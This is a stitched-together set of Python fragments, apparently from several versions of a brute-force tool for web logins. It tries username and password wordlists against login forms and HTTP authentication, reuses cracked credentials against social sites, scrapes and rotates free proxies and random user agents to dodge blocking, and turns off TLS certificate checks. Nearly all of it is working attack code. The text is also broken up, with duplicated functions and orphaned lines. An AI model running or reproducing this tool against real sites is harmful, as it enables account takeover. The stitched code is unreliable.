def parseFormInfo(optionURL):
######################################
# Test connect to URL
# Fetch login field
# TODO print ONLY ONE status message
#
#####################################
try:
process = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
process.addheaders = [('User-Agent', user_agent)]
process.open(optionURL)
#utils.printf("Connected. Getting form information...", "good")
formLoginID, formUserfield, formPasswdfield = tbrowser.getLoginForm(
process.forms())
#utils.printf("Found login form", "good")
return formLoginID, formUserfield, formPasswdfield
except TypeError as error:
#utils.printf("Can not find login form", "bad")
#sys.exit(1)
utils.die("Can not find login form", error)
except Exception as error:
#utils.printf(error, "bad")
utils.die("Checking connection error", error)
finally:
process.close()
def submit(options, loginInfo, creds, result):
tryPassword, tryUsername = creds
realm = loginInfo[0]
for cred in list(result.queue):
if tryUsername == cred[0]:
return True # don't run if find password of username
if options.verbose:
printf("[+] Trying: %s:%s" % (tryUsername, tryPassword), 'norm')
try:
proc = startBrowser(options.timeout)
proc.add_password(options.url, tryUsername, tryPassword, realm)
proc.open(options.url)
try:
proc.open(options.url)
# printf("[*] Page title: ['%s']" %(proc.title()), "good")
printf("[*] %s [%s]" % ([tryUsername, tryPassword], proc.title()),
"good")
result.put([options.url, tryUsername, tryPassword])
# printf("[*] Match found: %s" %([tryUsername, tryPassword]), "good")
except Exception as err:
try:
if err.code == 401:
if options.verbose:
printf("[-] Failed %s" % (creds[::-1]), "bad")
else:
printf("[x] %s: %s" % (err, creds[::-1]), "bad")
except:
die("[x] HTTP GET:", err)
except:
if options.verbose:
printf("[x] Failed!", "bad")
def check(target="https://google.com"):
# Single thread
try:
proxylist = actions.fload(PROXY_PATH)
#actions.fwrite(TMP_PATH, "") # create new empty list
workers = []
for i in xrange(THREADS):
worker = threading.Thread(target=checkAllProxy,
args=(
proxylist,
target,
))
workers.append(worker)
for worker in workers:
worker.daemon = True
worker.start()
except KeyboardInterrupt as error:
utils.die("Terminated by user!", error)
except Exception as error:
utils.die("Error while checking live proxy", error)
finally:
try:
for worker in workers:
worker.join()
except:
pass
def parse_proxy(response):
try:
re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
result = re.findall(re_ip, response, re.MULTILINE)
result = [element.replace("</td><td>", ":") for element in result]
return result
except Exception as error:
utils.die("Error while parsing proxy list.", error)
def main(URL, threads, verbose):
try:
import data
save = "%s/liveproxy.txt" % (data.__path__[0])
getNewProxy(save)
if URL:
check(URL, threads, verbose, save)
except Exception as err:
utils.die("GetProxy: Error while running module", err)
def check_login(opts):
try:
proc = startBrowser(options.timeout)
proc.open(opts.url)
"""
Check URL type. If Website directs to other URL,
options.url is website's panel
else: it is login url.
Example: options.url = site.com/wp-admin/ -> panel
site directs user to wp-login -> login URL
options.url = site.com/wp-login.php -> login URL
"""
if proc.geturl() != opts.url:
printf("[*] Website moves to: ['%s']" % (proc.geturl()), "norm")
opts.panel_url, opts.login_url = opts.url, proc.geturl()
else:
opts.login_url = opts.url
# printf("[*] Connect success!", "good")
options.attack_mode = "--loginbrute"
if opts.run_options["--verbose"]:
printf("[*] %s" % (proc.title()), "norm")
# printf("[+] Analyzing login form....")
loginInfo = parseLoginForm(proc.forms())
return loginInfo
except Exception as error:
try:
if error.code == 401:
## GET INFORMATION
resp_header = str(proc.response().info())
if "WWW-Authenticate" in resp_header:
loginID = checkHTTPGetLogin(resp_header)
loginInfo = (loginID, ["Password", "User Name"])
if options.verbose:
printf("[+] Using HTTP GET Authentication mode",
"norm")
options.attack_mode = "--httpget"
else:
loginInfo = False
else:
loginInfo = False
printf("[x] Target check: %s" % (error), "bad")
# Error != http code
except:
loginInfo = False
die("[x] Target check:", error)
except KeyboardInterrupt:
loginInfo = False
finally:
proc.close()
return loginInfo
def checProxyConnProvider(url="https://free-proxy-list.net/"):
try:
printf("[+] Getting proxy list from %s" % (url))
getproxy = startBrowser(options.timeout)
getproxy.open(url)
printf("[*] Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
die("[x] GetProxy: Error while connecting to proxy server!", error)
finally:
getproxy.close()
def run(options, creds):
social_urls = data.social_urls().replace("\t", "").split("\n")
for url in social_urls:
if options.url in url:
social_urls.remove(url)
result = Queue()
#workers = []
try:
for tryCreds in creds:
for url in social_urls:
submit(url, options, tryCreds, result)
# if len(workers) == options.threads:
# do_job(workers)
# del workers[:]
# worker = threading.Thread(
# target = submit,
# args = (url, options, tryCreds, result)
# )
#worker.daemon = True
#workers.append(worker)
#do_job(workers)
#del workers[:]
except KeyboardInterrupt:
printf("[x] Terminated by user!", "bad")
import os
os._exit(0)
except SystemExit:
die("[x] Terminated by system!", "SystemExit")
except Exception as err:
die("[x] ReAuth: Runtime error", err)
finally:
result = list(result.queue)
if len(result) == 0:
printf("[-] No extra valid password found", "bad")
else:
print_table(("Target", "Username", "Password"), *result)
def refresh():
try:
listproxy = parse_proxy(get_proxy_list())
except:
listproxy = ""
finally:
try:
listproxy = "\n".join(listproxy)
utils.printf("Write data to %s." % (PROXY_PATH))
actions.fwrite(PROXY_PATH, listproxy)
utils.printf("Write data to %s completed!" % (PROXY_PATH), "good")
except Exception as error:
utils.die("Error while writting proxy data", error)
def get_options(self):
szOptions = len(sys.argv)
if szOptions == 1:
# NO ARGUMENT
print_fast_help()
printf("Use: %s for more infomation\n" % (self.HELP_OPTIONS))
sys.exit(0)
else:
try:
self.parse_options(szOptions)
except Exception as error:
die("[x] Options: Parse options error", error)
def checkOption(options, run_options):
finalOption = {}
global MODE, DEF_WORDLIST
# Modify URL value to correct format
# Read password list
# Read userlist
# Convert to int(threads)
try:
finalOption["threads"] = int(options["-t"])
if finalOption["threads"] < 1:
utils.die("Argument error", "Threads must be > 1")
except Exception as ConvertError:
utils.die("Invalid threads", ConvertError)
if MODE == "--sqli":
finalOption["passlist"] = "MyP@ssW0rd"
finalOption["userlist"] = data.getSQL()
else:
# WARNING eval() is called. It can be unsafe
finalOption["passlist"] = eval(
"data.%s_pass()" % (options["-p"])).replace(
"\t", "") if options["-p"] in DEF_WORDLIST else actions.fread(
options["-p"])
if options["-U"]:
finalOption["userlist"] = actions.lread(options["-U"])
else:
finalOption["userlist"] = eval(
"data.%s_user()" % (options["-u"])).replace(
"\t",
"") if options["-u"] in DEF_WORDLIST else actions.fread(
options["-u"])
finalOption["falsekey"] = options["-k"]
if run_options["--proxy"]:
try:
import data
run_options["--proxy"] = actions.fread(
"%s/liveproxy.txt" % (data.__path__[0])).split("\n")
except Exception as err:
utils.printf("Argument error", err)
return finalOption, run_options
def checProxyConnProvider(url="https://free-proxy-list.net/"):
try:
utils.printf("Connecting to %s." % (url))
getproxy = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
getproxy.addheaders = [('User-Agent', user_agent)]
getproxy.open(url)
utils.printf("Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
utils.die("GetProxy: Error while connecting to proxy server!",
error)
finally:
getproxy.close()
def get_proxy_list(url="https://free-proxy-list.net/"):
try:
utils.printf("Connecting to %s." % (url))
# getproxy = mechanize.Browser()
# getproxy.set_handle_robots(False)
getproxy = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
getproxy.addheaders = [('User-Agent', user_agent)]
getproxy.open(url)
utils.printf("Gathering proxy completed.", "good")
return getproxy.response().read()
except Exception as error:
utils.die("Error while connecting to live proxy server!", error)
finally:
getproxy.close()
def getNewProxy(PROXY_PATH):
def parse_proxy(response):
try:
re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
result = re.findall(re_ip, response, re.MULTILINE)
result = [element.replace("</td><td>", ":") for element in result]
return result
except Exception as error:
utils.die("GetProxy: Error while parsing proxies.", error)
def checProxyConnProvider(url="https://free-proxy-list.net/"):
try:
utils.printf("Connecting to %s." % (url))
getproxy = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
getproxy.addheaders = [('User-Agent', user_agent)]
getproxy.open(url)
utils.printf("Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
utils.die("GetProxy: Error while connecting to proxy server!",
error)
finally:
getproxy.close()
try:
listproxy = parse_proxy(checProxyConnProvider())
except:
listproxy = ""
finally:
try:
listproxy = "\n".join(listproxy)
utils.printf("Write data to %s." % (PROXY_PATH))
actions.fwrite(PROXY_PATH, listproxy)
utils.printf("Write data to %s completed!" % (PROXY_PATH), "good")
except Exception as error:
utils.die("GetProxy: Error while writting data", error)
def checkOption(url, options, r_options):
finalOption = {}
global MODE
# Modify URL value to correct format
# Read password list
# Read userlist
# Convert to int(threads)
try:
finalOption["threads"] = int(options["-t"])
except Exception as ConvertError:
utils.die("Invalid threads", ConvertError)
if MODE == "--sqli":
finalOption["passlist"] = "MyP@ssW0rd"
finalOption["userlist"] = data.getSQL()
else:
finalOption["passlist"] = data.getPass(
) if options["-p"] == "default" else actions.fread(options["-p"])
if options["-U"]:
finalOption["userlist"] = actions.lread(options["-U"])
else:
finalOption["userlist"] = data.getUser(
) if options["-u"] == "default" else actions.fread(options["-u"])
finalOption["falsekey"] = options["-k"]
if "http" not in url:
url = "http://%s" % (url)
if url[-1] != "/":
url += "/"
if r_options["--proxy"]:
r_options["--proxy"] = actions.getProxyList()
return url, finalOption, r_options
def getLoginForm(optionURL, browser, verbose):
######################################
# Test connect to URL
# Fetch login field
#
#####################################
try:
browser.open(optionURL)
formLoginID, formUserfield, formPasswdfield = parseLoginForm(
browser.forms())
if verbose:
utils.printf("Found login form", "good")
return formLoginID, formUserfield, formPasswdfield
except TypeError as error:
utils.die("Can not find login form", error)
except Exception as error:
utils.die("Checking connection error", error)
def getnew(options):
def parse_proxy(response):
try:
re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
result = re.findall(re_ip, response, re.MULTILINE)
result = [element.replace("</td><td>", ":") for element in result]
return result
except Exception as error:
die("[x] GetProxy: Error while parsing proxies.", error)
def checProxyConnProvider(url="https://free-proxy-list.net/"):
try:
printf("[+] Getting proxy list from %s" % (url))
getproxy = startBrowser(options.timeout)
getproxy.open(url)
printf("[*] Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
die("[x] GetProxy: Error while connecting to proxy server!", error)
finally:
getproxy.close()
try:
listproxy = parse_proxy(checProxyConnProvider())
except:
listproxy = ""
finally:
try:
listproxy = "\n".join(listproxy)
printf("[*] Get %s proxies." % (len(listproxy)), "good")
printf("[+] Saving to %s" % (PROXY_PATH))
fwrite(PROXY_PATH, listproxy)
printf("[*] Data saved!", "good")
except Exception as error:
die("[x] GetProxy: Error while writting data", error)
def parse_options(self, szOptions):
i = 1
while i < szOptions:
if sys.argv[i] in self.HELP_OPTIONS:
self.help = True
elif sys.argv[i].startswith("--"):
if sys.argv[i] in self.run_options.keys():
self.run_options[sys.argv[i]] = True
elif sys.argv[i] in self.extra_mode:
self.extras.append(sys.argv[i])
elif sys.argv[i] in self.ATTACK_MODES:
self.attack_mode = sys.argv[i]
elif sys.argv[i] == "--list":
if sys.argv[i + 1] in self.WORDLISTS:
self.options["-u"] = sys.argv[i + 1]
self.options["-p"] = sys.argv[i + 1]
i += 1
else:
die(
"[x] Options: Arguments error",
"Invalid wordlist %s" %(sys.argv[i + 1])
)
elif sys.argv[i] in self.HELP_OPTIONS:
self.help = True
else:
die(
"[x] Options: Arguments error",
"Unknow option %s" %(sys.argv[i])
)
elif sys.argv[i].startswith("-"):
if sys.argv[i] in self.options.keys():
self.options[sys.argv[i]] = sys.argv[i + 1]
i += 1
else:
die(
"[x] Options: Arguments error",
"Unknow option %s" %(sys.argv[i])
)
else:
self.url = sys.argv[i]
i += 1
def run(checkedURL, creds, optionThreads, optionProxy, optionVerbose):
social_urls = data.social_urls().replace("\t", "").split("\n")
for url in social_urls:
# BUG double_free()
if checkedURL in url:
social_urls.remove(url)
result = Queue()
workers = []
try:
for tryCreds in creds:
for url in social_urls:
if actions.size_o(workers) == optionThreads:
do_job(workers)
del workers[:]
worker = threading.Thread(target=submit,
args=(url, tryCreds, optionProxy,
optionVerbose, result))
worker.daemon = True
workers.append(worker)
do_job(workers)
del workers[:]
except KeyboardInterrupt:
utils.die("[x] Terminated by user!", "KeyboardInterrupt")
except SystemExit:
utils.die("[x] Terminated by system!", "SystemExit")
except Exception as err:
utils.die("[x] ReAuth: Runtime error", err)
finally:
result = list(result.queue)
if actions.size_o(result) == 0:
utils.printf("[-] No extra valid password found", "bad")
else:
utils.print_table(("Target", "Username", "Password"), *result)
def handle(optionURL, optionUserlist, optionPasslist, sizePasslist,
setProxyList, setKeyFalse):
############################################
# Old code logic:
# Create 1 browser object per password
# Current:
# Create 1 browser object per username
# Pick 1 user agent per password try
#
############################################
# Get login form field informations
frmLoginID, frmUserfield, frmPassfield = parseFormInfo(optionURL)
# Get single Username in username list / file
for tryUsername in optionUserlist:
# If tryUsername is file object, remove \n
# tryUsername = tryUsername[:-1]
tryUsername = tryUsername.replace('\n', '')
try:
optionPasslist.seek(0)
except:
pass
###### new test code block
proc = tbrowser.startBrowser()
# proc = mechanize.Browser()
# proc.set_handle_robots(False)
######
idxTry = 0
for tryPassword in optionPasslist:
# Get single Password, remove \n
tryPassword = tryPassword.replace('\n', '')
# New test code block: add new user_agent each try
user_agent = tbrowser.useragent()
proc.addheaders = [('User-Agent', user_agent)]
#print "Debug: %s:%s" %(tryUsername, tryPassword)
if setProxyList:
#Set proxy connect
proxyAddr = actions.randomFromList(setProxyList)
#utils.printf("Debug: proxy addr %s" %(proxyAddr))
proc.set_proxies({"http": proxyAddr})
proc.open(optionURL)
# End new code block
try:
idxTry += 1
# Select login form
proc.select_form(nr=frmLoginID)
proc.form[frmUserfield] = tryUsername
proc.form[frmPassfield] = tryPassword
# Print status bar
utils.printp(tryUsername, idxTry, sizePasslist)
# Send request
proc.submit()
# Reload - useful for redirect to dashboard
proc.reload()
# If no login form -> success
# TODO improve condition to use captcha
if not tbrowser.getLoginForm(proc.forms()):
#TODO edit mixed condition
if setKeyFalse:
if setKeyFalse not in proc.response().read():
# Add creds to success list
# If verbose: print
printSuccess(tryUsername, tryPassword)
# Clear object and try new username
proc.close()
break
else:
utils.printSuccess(tryUsername, tryPassword)
# Clear object and try new username
proc.close()
break
except mechanize.HTTPError as error:
# Get blocked
utils.die("Thread has been blocked", error)
proc.close()
helps.print_help()
else:
create_tasks(options)
if "--getproxy" in options.extras:
getproxy.getnew(options)
if not options.url:
printf("[*] No URL provided! Get proxy only.", "good")
sys.exit(0)
else:
if not options.run_options["--proxy"]:
printf(
"[-] WARNING!!! Program runs without proxy! Use \"--proxy\"!",
"bad")
if not options.target:
die("[x] URL error", "An URL is required")
else:
# Fix SSL errors https://stackoverflow.com/a/35960702
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
printf(start_banner(options))
results = []
report_name)
reports.makeReport(
utils.report_banner(optionURL, optionRunMode,
optionProxy, optionThreads,
credentials, report_name, runtime,
IS_REGULAR), report_path)
utils.printf("\n[*] Report file at:\n%s" % (report_path),
"good")
except Exception as err:
utils.printf("[x] Error while creating report: %s" % (err),
"bad")
except Exception as err:
utils.printf("\n[x] Error while getting result.\n", "bad")
utils.printf(err, "bad")
runtime = time.time() - timeStarting
utils.printf("\n[*] Time elapsed: %0.5s [s]\n" % (runtime), "good")
sys.exit(0)
if __name__ == "__main__":
try:
main(*options.getUserOptions())
except Exception as err:
utils.die("", err)
def main(optionURL, setOptions, optionRunMode, setRunOptions):
def do_job(jobs):
for job in jobs:
job.start()
utils.printp
for job in jobs:
job.join()
import time, os, threading
# CHECK IMPORTING ALL LIBS. IMPORT HERE -> CALL HELP_BANNER ONLY FASTER
try:
import mechanize, re, requests # for basichttpauthentication, not useless, use later
except ImportError as err:
utils.die(err, "Try: pip install %s" % (str(err).split(" ")[-1]))
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
try:
from Queue import Queue
except ImportError:
from queue import Queue
result = Queue()
# BUG bad memory management
optionUserlist, optionThreads, optionKeyFalse, optionPasslist = setOptions.values(
)
optionProxy, optionReport, optionVerbose = setRunOptions.values()
try:
optionUserlist = optionUserlist.split("\n")
except:
pass
try:
optionPasslist = optionPasslist.split("\n")
except:
pass
## End of testing
timeStarting = time.time()
# get login form info
# call brute
IS_REGULAR = True
# IF NOT HTTP BASIC AUTHENTICATION, CHECK RESULT AND PARSE LOGIN FORM
proc = tbrowser.startBrowser()
proc.addheaders = [('User-Agent', tbrowser.useragent())]
if optionRunMode not in ["--httpauth"]:
try:
utils.printf("Checking connection...")
proc.open(optionURL)
#TODO PROXY
utils.printf("[*] Connect success!", "good")
loginInfo = tbrowser.parseLoginForm(proc.forms())
if not loginInfo:
utils.die("[x] URL error", "No login field found")
elif actions.size_o(loginInfo[1]) == 1: # Password checking only
utils.printf("[*] Form with password field", "good")
del optionUserlist[:]
optionUserlist = [""]
IS_REGULAR = False
elif actions.size_o(loginInfo[1]) == 2:
utils.printf("[*] Form username+password field", "good")
except Exception as err:
utils.die("[x] Can't connect to target", err)
finally:
proc.close()
#### END OF CHECKING TARGET
sizePasslist = actions.size_o(optionPasslist)
sizeUserlist = actions.size_o(optionUserlist)
workers = []
utils.printf("Starting attack....\nTask count: %s tasks" %
(sizeUserlist * sizePasslist))
############################
# Setting up threads
############################
try:
for password in optionPasslist:
for username in optionUserlist:
username, password = username.replace("\n",
""), password.replace(
"\n", "")
####
# IF HAVE ENOUGH THREAD, DO IT ALL
###
if actions.size_o(workers) == optionThreads:
do_job(workers)
del workers[:]
if optionRunMode == "--brute":
worker = threading.Thread(
target=loginbrute.submit,
args=(optionURL, [password, username
], optionProxy, optionKeyFalse,
optionVerbose, loginInfo, result))
elif optionRunMode == "--httpauth":
worker = threading.Thread(target=httpauth.submit,
args=(optionURL, username,
password, optionProxy,
optionVerbose, result))
worker.daemon = True
workers.append(worker)
######### END SETTING UP THREADS ################
#DO ALL LAST TASKs
do_job(workers)
del workers[:]
### CATCH ERRORS ###
except KeyboardInterrupt: # as error:
# TODO: kill running threads here
utils.die("[x] Terminated by user!", "KeyboardInterrupt")
except SystemExit: # as error
utils.die("[x] Terminated by system!", "SystemExit")
except Exception as error:
utils.die("[x] Runtime error", error)
### ALL TASKS DONE ####
finally:
runtime = time.time() - timeStarting
"""
All threads have been set daemon
Running threads should be stopped after main task done
"""
############################################
# Get result
#
############################################
try:
credentials = list(result.queue)
if actions.size_o(credentials) == 0:
utils.printf("[-] No match found!", "bad")
else:
utils.printf(
"\n[*] %s valid password[s] found:\n" %
(actions.size_o(credentials)), "norm")
if IS_REGULAR:
utils.print_table(("Username", "Password"), *credentials)
else:
if optionRunMode != "--sqli":
utils.print_table(("", "Password"), *credentials)
else:
utils.print_table(("Payload", ""),
*credentials) # TODO: test more
### CREATE REPORT ####
if optionReport:
try:
import reports
optionProxy = "True" if optionProxy else "False"
report_name = "%s_%s" % (time.strftime("%Y.%m.%d_%H.%M"),
optionURL.split("/")[2])
report_path = "%s/%s.txt" % (reports.__path__[0],
report_name)
reports.makeReport(
utils.report_banner(optionURL, optionRunMode,
optionProxy, optionThreads,
credentials, report_name, runtime,
IS_REGULAR), report_path)
utils.printf("\n[*] Report file at:\n%s" % (report_path),
"good")
except Exception as err:
utils.printf("[x] Error while creating report: %s" % (err),
"bad")
except Exception as err:
utils.printf("\n[x] Error while getting result.\n", "bad")
utils.printf(err, "bad")
utils.printf("\n[*] Time elapsed: %0.5s [s]\n" % (runtime), "good")
sys.exit(0)
def getUserOptions():
global URL, MODE, r_options, DEF_WORDLIST
# Default operation modes:
# --brute: brute force
# --sqli: sql injection bypass login (TODO)
# --httpauth: http basic authentication
DEF_R_MODE = ("--brute", "--sqli", "--httpauth")
# Default running mode:
# --verbose: display informations
# --report: create task report
# --proxy: Running using proxy
# Default options:
# -u: Read userlist from file
# -p: Read passlit from file
# -U: Read username / userlist directly from argument
# -t: Number of threads using
# -k: Set key for false condition (for special cases)
# Default wordlist: default, router, unix, tomcat, cctv, mirai, http
options = {
"-u": "default",
"-p": "default",
"-t": 16,
"-k": None,
"-U": None,
}
GETPROXY = False
########### STARTING ##################
if len(sys.argv) == 1:
utils.print_help()
sys.exit(0)
idx = 1
while idx < len(sys.argv):
if sys.argv[idx] in ("-h", "--help", "help"):
utils.print_help()
sys.exit(0)
else:
if sys.argv[idx][:2] == "--":
if sys.argv[idx] in r_options.keys():
# --verbose", "--report", "--proxy"
r_options[sys.argv[idx]] = True
elif sys.argv[idx] in DEF_R_MODE:
# "--brute", "--sqli", "--httpauth"
MODE = sys.argv[idx]
elif sys.argv[idx] == "--list":
# Wordlist provided
if sys.argv[idx + 1] in DEF_WORDLIST:
options["-u"], options["-p"], idx = sys.argv[
idx + 1], sys.argv[idx + 1], idx + 1
else:
utils.die("Error while parsing arguments",
"Invalid wordlist %s" % (sys.argv[idx + 1]))
elif sys.argv[idx] == "--getproxy":
GETPROXY = True
else:
utils.die("Error while parsing arguments",
"Invalid option %s" % (sys.argv[idx]))
elif sys.argv[idx][:1] == "-":
if sys.argv[idx] in options.keys():
# "-u", "-U", "-p", "-t", "-k"
options[sys.argv[idx]], idx = sys.argv[idx + 1], idx + 1
else:
utils.die("Error while parsing arguments",
"Invalid option %s" % (sys.argv[idx]))
else:
URL = sys.argv[idx]
idx += 1
URL = checkURL(URL)
if GETPROXY:
# TODO Auto brute using proxy after get new proxy
# TODO New help banner
from extras import getproxy
try:
threads = int(options["-t"])
except Exception as err:
utils.die("GetProxy: Error while parsing arguments", err)
getproxy.main(URL, threads, r_options["--verbose"])
# GET NEW PROXY LIST ONLY
if not URL:
sys.exit(0)
# else: CHECK PROXY TO TARGET DONE, AUTO ATTACK?
# r_options["--proxy"] == True
if not URL:
utils.die("Error while parsing arguments", "Invalid URL")
utils.printf(utils.start_banner(URL, options, MODE, r_options), "good")
options, r_options = checkOption(options, r_options)
return URL, options, MODE, r_options
utils.printf("%s %s" % (proxyAddr, error), "bad")
return None
finally:
try:
proxyTest.close()
except:
pass
if __name__ == "__main__":
current_dir = actions.getRootDir(sys.argv[0])
if current_dir:
os.chdir(current_dir)
if len(sys.argv) == 1:
help()
elif len(sys.argv) == 2:
option = sys.argv[1]
if option in ["help", "--help", "-h"]:
help()
elif option == "get":
refresh()
elif option == "check":
check()
else:
utils.die("Invalid options!", "Usage:\n\tpython getproxy.py help")
elif len(sys.argv) == 3:
option, value = sys.argv[1], sys.argv[2]
if option == "check":
check(value)
else:
utils.die("Invalid options!", "Usage:\n\tpython getproxy.py help")
def main(optionURL, setOptions, optionRunMode, setRunOptions):
def do_job(jobs):
for job in jobs:
job.start()
for job in jobs:
job.join()
import time, os, threading
# CHECK IMPORTING ALL LIBS. IMPORT HERE -> CALL HELP_BANNER ONLY FASTER
try:
import mechanize, re, ssl, requests # for basichttpauthentication, not useless, use later
except ImportError as err:
utils.die(err, "Try: pip install %s" % (str(err).split(" ")[-1]))
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
try:
from Queue import Queue
except ImportError:
from queue import Queue
result = Queue()
# BUG bad memory management
optionUserlist, optionThreads, optionKeyFalse, optionPasslist = setOptions.values(
)
optionProxy, optionReport, optionVerbose = setRunOptions.values()
try:
optionUserlist = optionUserlist.split("\n")
except:
#optionUserlist = optionUserlist.readlines()
pass
# TODO Must testing cases with list and file object
try:
optionPasslist = optionPasslist.split("\n")
except:
pass
## End of testing
timeStarting = time.time()
# get login form info
# call brute
sizePasslist = actions.size_o(optionPasslist)
sizeUserlist = actions.size_o(optionUserlist)
proc = tbrowser.startBrowser()
proc.addheaders = [('User-Agent', tbrowser.useragent())]
try:
utils.printf("Checking connection...")
proc.open(optionURL)
#TODO PROXY
loginInfo = tbrowser.getLoginForm(optionURL, proc, optionVerbose)
utils.printf("Connect success!", "good")
except Exception as err:
utils.die("Error while parsing login form", err)
finally:
proc.close()
utils.printf("Starting attack.... %s tasks" %
(sizeUserlist * sizePasslist))
workers = []
trying = 0
try:
for password in optionPasslist:
for username in optionUserlist:
if len(workers) == optionThreads:
do_job(workers)
del workers[:]
if optionRunMode == "--brute":
worker = threading.Thread(
target=loginbrute.submit,
args=(optionURL, username.replace("\n", ""),
password.replace("\n", ""),
sizeUserlist * sizePasslist, optionProxy,
optionKeyFalse, optionVerbose, loginInfo,
result))
worker.daemon = True
workers.append(worker)
#DO ALL LAST TASKs
do_job(workers)
del workers[:]
except KeyboardInterrupt: # as error:
# TODO: kill running threads here
utils.die("Terminated by user!", "KeyboardInterrupt")
except SystemExit: # as error
utils.die("Terminated by system!", "SystemExit")
except Exception as error:
utils.die("Error while running", error)
finally:
runtime = time.time() - timeStarting
"""
All threads have been set daemon
Running threads should be stopped after main task done
"""
############################################
# Get result
#
############################################
try:
credentials = list(result.queue)
if len(credentials) == 0:
utils.printf("[-] No valid password found!", "bad")
else:
utils.printf(
"\n[*] %s valid password[s] found:\n" % (len(credentials)),
"norm")
utils.print_table(("Username", "Password"), *credentials)
if optionReport:
try:
import report
optionProxy = "True" if optionProxy else "False"
report_name = "%s_%s" % (time.strftime("%Y.%m.%d_%H.%M"),
optionURL.split("/")[2])
report_path = "%s/%s.txt" % (reports.__path__[0],
report_name)
reports.makeReport(
utils.report_banner(optionURL, optionRunMode,
optionProxy, optionThreads,
credentials, report_name, runtime),
report_path)
utils.printf("\n[*]Report file at:\n%s" % (report_path),
"good")
except Exception as err:
utils.printf("Error while creating report: %s" % (err),
"bad")
except Exception as err:
utils.printf("\nError while getting result.\n", "bad")
utils.printf(err, "bad")
utils.printf("\nCompleted. Run time: %0.5s [s]\n" % (runtime))
########################################
# Clear resources
#
########################################
try:
optionPasslist.close()
except:
pass
try:
optionUserlist.close()
except:
pass
sys.exit(0)
def check(target, threads, verbose, PROXY_PATH):
def do_job(jobs):
for job in jobs:
job.start()
for job in jobs:
job.join()
def checProxyConn(proxyAddr, target, result, verbose):
try:
proxyTest = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
proxyTest.addheaders = [('User-Agent', user_agent)]
proxyTest.set_proxies({"http": proxyAddr})
if verbose:
utils.printf("Trying: %s" % (proxyAddr))
proxyTest.open(target)
if verbose:
utils.printf("Success: %s" % (proxyAddr), "good")
result.put(proxyAddr)
except Exception as error:
if verbose:
utils.printf("%s %s" % (proxyAddr, error), "bad")
finally:
try:
proxyTest.close()
except:
pass
try:
proxylist = actions.fread(PROXY_PATH).split("\n")
workers = []
result = Queue()
for tryProxy in proxylist:
if len(workers) == threads:
do_job(workers)
del workers[:]
worker = threading.Thread(target=checProxyConn,
args=(tryProxy, target, result, verbose))
worker.daemon = True
workers.append(worker)
do_job(workers)
del workers[:]
except KeyboardInterrupt as error:
utils.die("GetProxy: Terminated by user!", error)
except Exception as error:
utils.die("GetProxy: Error while checking proxy connection to target",
error)
finally:
try:
utils.printf("GetProxy: Write working proxies")
actions.fwrite(PROXY_PATH, "\n".join(list(result.queue)))
utils.printf("Write working proxies completed", "good")
except Exception as err:
utils.die("GetProxy: Error while writing result", err)
def attack(options, loginInfo):
def run_threads(threads, sending, completed, total):
# Run threads
for thread in threads:
sending += 1 # Sending
progress_bar(sending, completed, total)
thread.start()
# Wait for threads completed
for thread in threads:
completed += 1
progress_bar(sending, completed, total)
thread.join()
return sending, completed
### SETTING UP FOR NEW ATTACK ###
if options.attack_mode == "--httpget":
from modules import httpget
attack_module = httpget.submit
elif options.attack_mode == "--loginbrute":
from modules import loginbrute
attack_module = loginbrute.submit
else:
die("[x] Runtime error: Invalid attack mode",
"%s" % (options.attack_mode))
if not loginInfo:
# Test for 2 steps... login?
die("[x] Target check: URL error", "[x] No login request found")
else:
if options.verbose:
printf("[*] Login request has been found!", "good")
tasks = len(options.passwd) * len(options.username)
printf(
"[+] [Tasks: %s] [ID: %s] [Controls: %s]" %
(tasks, loginInfo[0], loginInfo[1][::-1]), "good")
import Queue
result = Queue.Queue()
sending, completed = 0, 0
try:
#### START ATTACK ####
workers = []
for username in options.username:
if "--upwd" in options.extras \
and username not in options.passwd \
and options.options["-p"] is not "sqli":
options.passwd += (username, )
for password in options.passwd:
if len(workers) == options.threads:
sending, completed = run_threads(workers, sending,
completed, tasks)
del workers[:]
worker = threading.Thread(target=attack_module,
args=(options, loginInfo,
[password, username], result))
workers.append(worker)
worker.daemon = True
sending, completed = run_threads(workers, sending, completed, tasks)
del workers[:]
except KeyboardInterrupt:
printf("[x] Terminated by user!", "bad")
global set_break
set_break = True
except SystemExit:
printf("[x] Terminated by system!", "bad")
except Exception as error:
die("[x] Runtime error", error)
finally:
credentials = list(result.queue)
if len(credentials) == 0:
printf("[-] No match found!", "bad")
else:
printf("\n[*] %s valid password[s] found:" % (len(credentials)),
"norm")
if not credentials[0][1]:
print_table(("URL", "Password"),
*[creds[::2] for creds in credentials])
else:
print_table(("Username", "Password"),
*[creds[-2:] for creds in credentials])
printf("")
return credentials
def check(options):
def do_job(jobs):
for job in jobs:
job.start()
for job in jobs:
job.join()
def checProxyConn(proxyAddr, target, result, verbose):
try:
proxyTest = startBrowser(options.timeout)
proxyTest.set_proxies({"http": proxyAddr})
if verbose:
printf("[+] Trying: %s" % (proxyAddr))
proxyTest.open(options.url)
if verbose:
printf("[*] Success: %s" % (proxyAddr), "good")
result.put(proxyAddr)
except Exception as error:
if verbose:
printf("[x] %s %s" % (proxyAddr, error), "bad")
finally:
try:
proxyTest.close()
